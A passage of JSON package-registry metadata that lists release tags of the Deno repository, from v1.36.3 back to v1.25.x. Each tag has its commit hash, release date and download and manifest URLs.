4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba